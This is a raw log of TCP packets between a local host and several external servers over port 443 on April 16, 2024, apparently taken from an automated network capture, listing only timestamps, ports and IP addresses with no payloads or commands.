Apr 16, 2024 11:43:59.598170042 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.605859041 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.605871916 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.660120964 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.783145905 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.798846960 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.798871994 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.798892021 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.798933029 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.798958063 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.799073935 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.799074888 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.799074888 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.799074888 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.799108982 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.799132109 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.799232006 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.818095922 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.818149090 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.818192005 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.818224907 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.818264961 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.818275928 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.818315983 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.848465919 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848490953 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848509073 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848525047 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848541975 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848557949 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848557949 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.848573923 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848582983 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.848583937 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848602057 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.848866940 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.848877907 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848898888 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848917007 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.848934889 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.849016905 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.849026918 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.849711895 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.849731922 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.849749088 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.849767923 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.849771023 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.849778891 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.849800110 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.849826097 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.849831104 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.850661993 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.850682020 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.850697994 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.850706100 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.850718975 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.850744963 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.851517916 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.851535082 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.851552010 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.851567984 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.851583958 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.851588964 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.851598024 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.851617098 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.852394104 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.852479935 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.852488041 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.852632046 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.852648973 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.852667093 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.852683067 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.852689981 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.852696896 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.852720022 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.852818966 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.853312016 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.853425026 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.853441000 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.853457928 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.853504896 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.853532076 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.853542089 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.854008913 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.854312897 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.854387999 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.904515982 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.904623985 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.904637098 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.904679060 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.904711962 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.904733896 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.904733896 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.904850006 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.905724049 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.905740976 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.952655077 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.952841043 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.953010082 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.953043938 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.953079939 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.953108072 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.953131914 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.953809977 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.953840017 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.953875065 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.953886986 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.953922033 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.954732895 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.954758883 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.954792976 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.954811096 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.954837084 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.955602884 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.955630064 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.955689907 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.955704927 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.956461906 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.956490993 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.956530094 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.956546068 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.956576109 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.957484007 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.957510948 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.957545042 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.957559109 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.957592964 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.958328962 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.958420038 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.958436966 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.958451033 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.958482027 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.959043026 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.959166050 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.959178925 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.959439993 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.959867001 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.959897995 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.959944963 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.959944963 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.959960938 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.960038900 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.008131027 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 16, 2024 11:44:00.057013035 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.057097912 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.057138920 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.057153940 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.057225943 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.057269096 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.057269096 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.057904959 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.058023930 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.058041096 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.058187962 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.058697939 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.058814049 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.058945894 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.059009075 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.059062958 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.059411049 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.059613943 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.059698105 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.059725046 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.060134888 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.060621977 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.060712099 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.060734034 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.061372995 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.061425924 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.061511993 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.061534882 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.061934948 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.062382936 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.062488079 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.062498093 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.062531948 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.062571049 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.062649965 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.063271999 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.063376904 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.063378096 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.063405991 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.063440084 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.063517094 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.064270973 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.064383984 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.064397097 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.064412117 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.064450026 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.064770937 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.065257072 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.065352917 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.065365076 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.065392017 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.065429926 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.065803051 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.066070080 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.066162109 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.066992044 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.067047119 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.067085028 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.067099094 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.067131996 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.067277908 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.068958998 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.069006920 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.069058895 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.069072008 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.069116116 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.069138050 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.071568012 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.071609974 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.071661949 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.071676016 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.071712017 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.071728945 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.073277950 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.073319912 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.073364019 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.073378086 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.073419094 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.073537111 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.078367949 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.078393936 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.078463078 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.078474998 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.078511000 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.078512907 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.078532934 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.078552961 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.078572035 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.078597069 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.078615904 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.078634977 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.080084085 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.080122948 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.080207109 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.080207109 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.080224037 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.080287933 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.080791950 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.080810070 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.080899954 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.080914021 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.082519054 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.082537889 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.082653046 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.082669020 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.082890034 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.161385059 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.161452055 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.161627054 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.161691904 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.161766052 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.162009001 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.162239075 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.162287951 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.162331104 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.162345886 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.162441969 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.162884951 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.164680958 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.164697886 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.164782047 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.164782047 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.164798975 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.164858103 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.166488886 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.166508913 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.166737080 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.166750908 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.166817904 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.168553114 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.168569088 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.168992996 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.169007063 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.169418097 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.169423103 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.169436932 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.169466019 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.169500113 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.169513941 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.169537067 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.169761896 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.169872046 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:44:00.169903040 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:44:00.313529015 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.313577890 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.314352989 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.315851927 CEST	49707	443	192.168.2.7	192.229.173.207
Apr 16, 2024 11:44:00.315871954 CEST	443	49707	192.229.173.207	192.168.2.7
Apr 16, 2024 11:44:00.318250895 CEST	49708	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:44:00.318335056 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.318401098 CEST	49708	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:44:00.319555044 CEST	49708	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:44:00.319596052 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.320384026 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.320414066 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.320739985 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.321074963 CEST	49709	443	192.168.2.7	104.17.24.14
Apr 16, 2024 11:44:00.321090937 CEST	443	49709	104.17.24.14	192.168.2.7
Apr 16, 2024 11:44:00.365868092 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.365890026 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.366012096 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366033077 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.366091967 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366091967 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366099119 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.366116047 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366137028 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366200924 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366210938 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.366508007 CEST	49710	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366508007 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366527081 CEST	443	49710	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.366871119 CEST	49712	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.366883993 CEST	443	49712	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.367072105 CEST	49711	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.367086887 CEST	443	49711	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.367355108 CEST	49713	443	192.168.2.7	13.107.213.40
Apr 16, 2024 11:44:00.367369890 CEST	443	49713	13.107.213.40	192.168.2.7
Apr 16, 2024 11:44:00.367747068 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.367762089 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.367857933 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.368216991 CEST	49714	443	192.168.2.7	152.199.4.44
Apr 16, 2024 11:44:00.368230104 CEST	443	49714	152.199.4.44	192.168.2.7
Apr 16, 2024 11:44:00.395219088 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.395257950 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:00.395323992 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.395467997 CEST	49716	443	192.168.2.7	13.107.246.40
Apr 16, 2024 11:44:00.395486116 CEST	443	49716	13.107.246.40	192.168.2.7
Apr 16, 2024 11:44:00.537190914 CEST	443	49708	104.17.96.13	192.168.2.7
Apr 16, 2024 11:44:00.538964987 CEST	49708	443	192.168.2.7	104.17.96.13
